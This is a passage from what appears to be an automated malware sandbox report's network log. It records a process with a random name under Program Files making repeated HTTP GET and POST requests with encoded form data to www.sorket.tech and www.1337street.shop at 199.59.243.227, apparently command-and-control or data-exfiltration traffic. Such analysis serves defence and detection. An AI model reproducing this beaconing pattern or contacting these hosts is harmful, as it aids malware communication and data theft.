                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiY2I2ZmI2MDYtNWI2MC00NzUyLWFhN2UtMWQ0NjQ4OGY4ODNlIiwicGFnZV90aW1lIjoxNzM1MDM2Nj


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    16192.168.2.449896199.59.243.227801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:37:11.990228891 CET420OUTGET /4emb/?APatc2S=4UULdis/QLNauySAEekUDYGsEUzq6e4B9T06+64m5ppnN51KKUcjYDTfNmInUMaV4Nrjr2QNBcJEKgo4MRK3zTGcylMwgMm1Um/ECC9y2F4s+sXg4aJXZlc=&3FNHL=wVCtFrFXof HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.sorket.tech
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Dec 24, 2024 11:37:13.071743011 CET1236INHTTP/1.1 200 OK
                                                                                                                    date: Tue, 24 Dec 2024 10:37:12 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1466
                                                                                                                    x-request-id: 5689b0bd-c9c9-45d0-9527-19bcf0c129be
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_SV7UIkMxuZZt+QcRwILjmddlsF3mjDxqrMl+7Q4+OyyrAzCq+i+qjuYx35y/CVmvdTrs5GkxRf+zP0wTgDLU9g==
                                                                                                                    set-cookie: parking_session=5689b0bd-c9c9-45d0-9527-19bcf0c129be; expires=Tue, 24 Dec 2024 10:52:12 GMT; path=/
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 53 56 37 55 49 6b 4d 78 75 5a 5a 74 2b 51 63 52 77 49 4c 6a 6d 64 64 6c 73 46 33 6d 6a 44 78 71 72 4d 6c 2b 37 51 34 2b 4f 79 79 72 41 7a 43 71 2b 69 2b 71 6a 75 59 78 33 35 79 2f 43 56 6d 76 64 54 72 73 35 47 6b 78 52 66 2b 7a 50 30 77 54 67 44 4c 55 39 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_SV7UIkMxuZZt+QcRwILjmddlsF3mjDxqrMl+7Q4+OyyrAzCq+i+qjuYx35y/CVmvdTrs5GkxRf+zP0wTgDLU9g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                    Dec 24, 2024 11:37:13.071909904 CET919INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTY4OWIwYmQtYzljOS00NWQwLTk1MjctMTliY2YwYzEyOWJlIiwicGFnZV90aW1lIjoxNzM1MDM2Nj


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    17192.168.2.449914199.59.243.227801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:37:18.759177923 CET694OUTPOST /0gdu/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.1337street.shop
                                                                                                                    Origin: http://www.1337street.shop
                                                                                                                    Referer: http://www.1337street.shop/0gdu/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 204
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 53 76 31 6b 55 48 53 7a 69 4a 68 36 68 66 6f 46 65 6b 38 54 61 6f 55 55 66 50 39 6b 30 30 53 69 71 37 2f 76 45 36 53 70 77 70 6a 58 66 74 45 72 61 50 4a 38 67 51 35 77 64 5a 41 76 48 69 30 54 73 4c 58 75 69 7a 64 72 54 76 32 30 69 6c 76 2f 4e 42 62 6b 43 2b 36 66 39 4b 58 42 5a 53 6d 44 4e 32 49 59 4f 64 50 70 70 33 7a 44 76 4d 50 50 65 46 63 54 38 46 47 37 34 36 45 58 68 61 59 4a 56 72 76 73 62 77 4f 71 57 6b 50 50 42 38 63 66 78 6a 63 64 4a 35 4f 35 59 35 36 64 70 55 6c 64 59 6d 57 30 64 45 47 79 55 36 6f 67 63 41 48 68 43 34 54 4d 56 50 54 71 36 69 78 2f 39 54 44 72 41 41 3d 3d
                                                                                                                    Data Ascii: APatc2S=Sv1kUHSziJh6hfoFek8TaoUUfP9k00Siq7/vE6SpwpjXftEraPJ8gQ5wdZAvHi0TsLXuizdrTv20ilv/NBbkC+6f9KXBZSmDN2IYOdPpp3zDvMPPeFcT8FG746EXhaYJVrvsbwOqWkPPB8cfxjcdJ5O5Y56dpUldYmW0dEGyU6ogcAHhC4TMVPTq6ix/9TDrAA==
                                                                                                                    Dec 24, 2024 11:37:19.919882059 CET1236INHTTP/1.1 200 OK
                                                                                                                    date: Tue, 24 Dec 2024 10:37:18 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1126
                                                                                                                    x-request-id: 12bbd836-b608-440e-9ee6-d3127d20bd1f
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_McNbi5gT5saKzYoEriRN4G8J574bhiuiQSjWPMwNAYfSr60Lh40elK39T8Mh8kdso2drllDEmNLbxbQPeRUCsw==
                                                                                                                    set-cookie: parking_session=12bbd836-b608-440e-9ee6-d3127d20bd1f; expires=Tue, 24 Dec 2024 10:52:19 GMT; path=/
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4d 63 4e 62 69 35 67 54 35 73 61 4b 7a 59 6f 45 72 69 52 4e 34 47 38 4a 35 37 34 62 68 69 75 69 51 53 6a 57 50 4d 77 4e 41 59 66 53 72 36 30 4c 68 34 30 65 6c 4b 33 39 54 38 4d 68 38 6b 64 73 6f 32 64 72 6c 6c 44 45 6d 4e 4c 62 78 62 51 50 65 52 55 43 73 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_McNbi5gT5saKzYoEriRN4G8J574bhiuiQSjWPMwNAYfSr60Lh40elK39T8Mh8kdso2drllDEmNLbxbQPeRUCsw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                    Dec 24, 2024 11:37:19.919905901 CET579INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTJiYmQ4MzYtYjYwOC00NDBlLTllZTYtZDMxMjdkMjBiZDFmIiwicGFnZV90aW1lIjoxNzM1MDM2Nj


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    18192.168.2.449920199.59.243.227801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:37:21.428368092 CET714OUTPOST /0gdu/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.1337street.shop
                                                                                                                    Origin: http://www.1337street.shop
                                                                                                                    Referer: http://www.1337street.shop/0gdu/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 224
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 53 76 31 6b 55 48 53 7a 69 4a 68 36 6a 2f 34 46 59 45 41 54 62 49 55 58 42 2f 39 6b 2b 55 53 6d 71 37 37 76 45 37 6e 73 7a 62 48 58 66 50 4d 72 62 4f 4a 38 6a 51 35 77 53 35 42 72 45 53 30 63 73 4c 54 49 69 78 5a 72 54 76 53 30 69 67 54 2f 4e 78 6e 6e 44 75 36 64 78 71 58 44 47 43 6d 44 4e 32 49 59 4f 64 4c 54 70 33 37 44 76 38 66 50 65 67 77 51 31 6c 47 6b 6f 71 45 58 73 36 59 4e 56 72 76 72 62 79 36 4d 57 6e 33 50 42 39 73 66 78 79 63 63 53 4a 4f 2f 62 4a 37 74 34 6b 51 7a 58 6a 7a 2f 43 79 43 42 61 61 35 42 51 6d 4b 37 54 4a 79 62 48 50 33 5a 6e 6c 34 4c 77 51 2b 69 62 46 34 39 55 63 5a 32 33 33 30 6e 49 50 77 39 74 72 44 78 67 64 6b 3d
                                                                                                                    Data Ascii: APatc2S=Sv1kUHSziJh6j/4FYEATbIUXB/9k+USmq77vE7nszbHXfPMrbOJ8jQ5wS5BrES0csLTIixZrTvS0igT/NxnnDu6dxqXDGCmDN2IYOdLTp37Dv8fPegwQ1lGkoqEXs6YNVrvrby6MWn3PB9sfxyccSJO/bJ7t4kQzXjz/CyCBaa5BQmK7TJybHP3Znl4LwQ+ibF49UcZ2330nIPw9trDxgdk=
                                                                                                                    Dec 24, 2024 11:37:22.508752108 CET1236INHTTP/1.1 200 OK
                                                                                                                    date: Tue, 24 Dec 2024 10:37:21 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1126
                                                                                                                    x-request-id: c4f9eb8f-a524-402d-b5c8-de3f71d17006
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_McNbi5gT5saKzYoEriRN4G8J574bhiuiQSjWPMwNAYfSr60Lh40elK39T8Mh8kdso2drllDEmNLbxbQPeRUCsw==
                                                                                                                    set-cookie: parking_session=c4f9eb8f-a524-402d-b5c8-de3f71d17006; expires=Tue, 24 Dec 2024 10:52:22 GMT; path=/
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4d 63 4e 62 69 35 67 54 35 73 61 4b 7a 59 6f 45 72 69 52 4e 34 47 38 4a 35 37 34 62 68 69 75 69 51 53 6a 57 50 4d 77 4e 41 59 66 53 72 36 30 4c 68 34 30 65 6c 4b 33 39 54 38 4d 68 38 6b 64 73 6f 32 64 72 6c 6c 44 45 6d 4e 4c 62 78 62 51 50 65 52 55 43 73 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_McNbi5gT5saKzYoEriRN4G8J574bhiuiQSjWPMwNAYfSr60Lh40elK39T8Mh8kdso2drllDEmNLbxbQPeRUCsw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                    Dec 24, 2024 11:37:22.508766890 CET579INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzRmOWViOGYtYTUyNC00MDJkLWI1YzgtZGUzZjcxZDE3MDA2IiwicGFnZV90aW1lIjoxNzM1MDM2Nj


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    19192.168.2.449926199.59.243.227801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:37:24.084553003 CET10796OUTPOST /0gdu/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.1337street.shop
                                                                                                                    Origin: http://www.1337street.shop
                                                                                                                    Referer: http://www.1337street.shop/0gdu/
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 10304
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Data Raw: 41 50 61 74 63 32 53 3d 53 76 31 6b 55 48 53 7a 69 4a 68 36 6a 2f 34 46 59 45 41 54 62 49 55 58 42 2f 39 6b 2b 55 53 6d 71 37 37 76 45 37 6e 73 7a 62 50 58 66 63 55 72 5a 70 39 38 69 51 35 77 62 5a 42 6f 45 53 30 42 73 4c 72 55 69 78 45 57 54 70 57 30 69 43 72 2f 4c 43 2f 6e 61 2b 36 64 73 61 58 43 5a 53 6d 73 4e 32 5a 66 4f 64 37 54 70 33 37 44 76 35 54 50 58 56 63 51 7a 6c 47 37 34 36 45 54 68 61 59 31 56 72 48 6b 62 79 75 36 56 57 58 50 42 64 38 66 77 41 45 63 65 4a 4f 39 65 4a 37 31 34 6b 4d 77 58 6e 54 56 43 79 66 4a 61 59 6c 42 41 77 4c 55 4a 72 6d 36 5a 2b 54 6b 2b 48 55 62 31 6e 43 34 57 6e 6f 55 46 38 70 4d 76 31 38 34 49 76 31 51 31 4c 54 6d 2f 39 43 6d 56 56 59 47 46 45 62 71 71 69 6b 55 42 7a 75 7a 71 4f 39 2f 61 77 62 48 61 72 30 42 2f 6a 4f 4e 35 68 70 4f 63 41 74 41 32 4f 41 43 30 4a 6a 70 72 31 49 46 32 76 7a 4b 35 59 6e 66 35 33 30 57 72 45 50 41 35 54 56 41 4b 41 59 6b 4a 44 7a 5a 34 4d 70 42 74 68 64 42 45 6d 59 30 59 48 4a 76 38 53 57 2f 37 62 50 51 5a 70 4d 62 34 38 53 54 68 7a [TRUNCATED]
                                                                                                                    Data Ascii: APatc2S=Sv1kUHSziJh6j/4FYEATbIUXB/9k+USmq77vE7nszbPXfcUrZp98iQ5wbZBoES0BsLrUixEWTpW0iCr/LC/na+6dsaXCZSmsN2ZfOd7Tp37Dv5TPXVcQzlG746EThaY1VrHkbyu6VWXPBd8fwAEceJO9eJ714kMwXnTVCyfJaYlBAwLUJrm6Z+Tk+HUb1nC4WnoUF8pMv184Iv1Q1LTm/9CmVVYGFEbqqikUBzuzqO9/awbHar0B/jON5hpOcAtA2OAC0Jjpr1IF2vzK5Ynf530WrEPA5TVAKAYkJDzZ4MpBthdBEmY0YHJv8SW/7bPQZpMb48SThzxIAFin8teUZJuZO2onckUkjtY8lNlBLQSBuz9PnNsZP7eNE4/81pL3bgSU443gdzwx5g+S7wW+ql04d74X3Qltek3XvLMxrgF9s2reOaptkfN1C3AuECEYUXjE7E+//sl/87UFMU9ajzZWA0+J4dcf+mZt5G1m24oAFcWVNL4MKlkqFe7s3qqL+1UAIUuPN0yjbPHFd/i6ioU1qO+S1m+cd+9BZEXAx04DGUe9gIHSXpEybPIMXfEJdIbi1sy8QQnoDJubN82whvHleFjzQBqTmUVKMcUAjya9KoGEC+uhtZdFYCrB2gHdbm66fVir9yLbUah8CMNQBL7d1d1AxJZBk7cFPcwVoU+/FUY939+N9ZRUVyYyEokYY/KyPEqAcVDgC8tdNFS24L/Rzo1rwZ4ii7R3OVVKN/1+fPJ6YKLy0E4KAQTYZTgMgehieFsddyNsxnl2gdeZ6CPVQaZnAOQ0mf5Hl61Yqx8P/p7bMjf+FmXfnhRluddcMNgHH+Skx3Ick9lxDI925i/IhiH3qDsbSOI4ko94UPH4d+/nJD16QEIFlcUJ/GJPgD4C1jZit07mJFoTMvKHJDpRD9B2ShFwt+U0And+NnlApLne4+sHgjSPba7+MYIuBNS+aBL+8IJFxMibR06fVyrtkMd8JmosrV5cRswN1zQv [TRUNCATED]
                                                                                                                    Dec 24, 2024 11:37:25.178599119 CET1236INHTTP/1.1 200 OK
                                                                                                                    date: Tue, 24 Dec 2024 10:37:24 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1126
                                                                                                                    x-request-id: 0940bdc4-b3ca-412f-a538-706f0d83d5f9
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
                                                                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_McNbi5gT5saKzYoEriRN4G8J574bhiuiQSjWPMwNAYfSr60Lh40elK39T8Mh8kdso2drllDEmNLbxbQPeRUCsw==
                                                                                                                    set-cookie: parking_session=0940bdc4-b3ca-412f-a538-706f0d83d5f9; expires=Tue, 24 Dec 2024 10:52:25 GMT; path=/
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4d 63 4e 62 69 35 67 54 35 73 61 4b 7a 59 6f 45 72 69 52 4e 34 47 38 4a 35 37 34 62 68 69 75 69 51 53 6a 57 50 4d 77 4e 41 59 66 53 72 36 30 4c 68 34 30 65 6c 4b 33 39 54 38 4d 68 38 6b 64 73 6f 32 64 72 6c 6c 44 45 6d 4e 4c 62 78 62 51 50 65 52 55 43 73 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_McNbi5gT5saKzYoEriRN4G8J574bhiuiQSjWPMwNAYfSr60Lh40elK39T8Mh8kdso2drllDEmNLbxbQPeRUCsw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                    Dec 24, 2024 11:37:25.178627968 CET579INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDk0MGJkYzQtYjNjYS00MTJmLWE1MzgtNzA2ZjBkODNkNWY5IiwicGFnZV90aW1lIjoxNzM1MDM2Nj


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    20192.168.2.449933199.59.243.227801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:37:26.735771894 CET424OUTGET /0gdu/?APatc2S=ftdEXwexurZghboTWCQIfexBY+9Yz0emmuPXGo7z5YH1NvMxMc1Z+hNvSZgcJAE/0+TeoQEUDOn3ji72SzidAcXn1q/xR22GeFlELvD1wSK+h6ylcF5G1Wk=&3FNHL=wVCtFrFXof HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.1337street.shop
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Dec 24, 2024 11:37:27.820919991 CET1236INHTTP/1.1 200 OK
                                                                                                                    date: Tue, 24 Dec 2024 10:37:27 GMT
                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                    content-length: 1478
                                                                                                                    x-request-id: ed82d55f-19cb-4eb8-b61c-a08a819f8a87
                                                                                                                    cache-control: no-store, max-age=0
                                                                                                                    accept-ch: sec-ch-prefers-color-scheme
                                                                                                                    critical-ch: sec-ch-prefers-color-scheme
                                                                                                                    vary: sec-ch-prefers-color-scheme
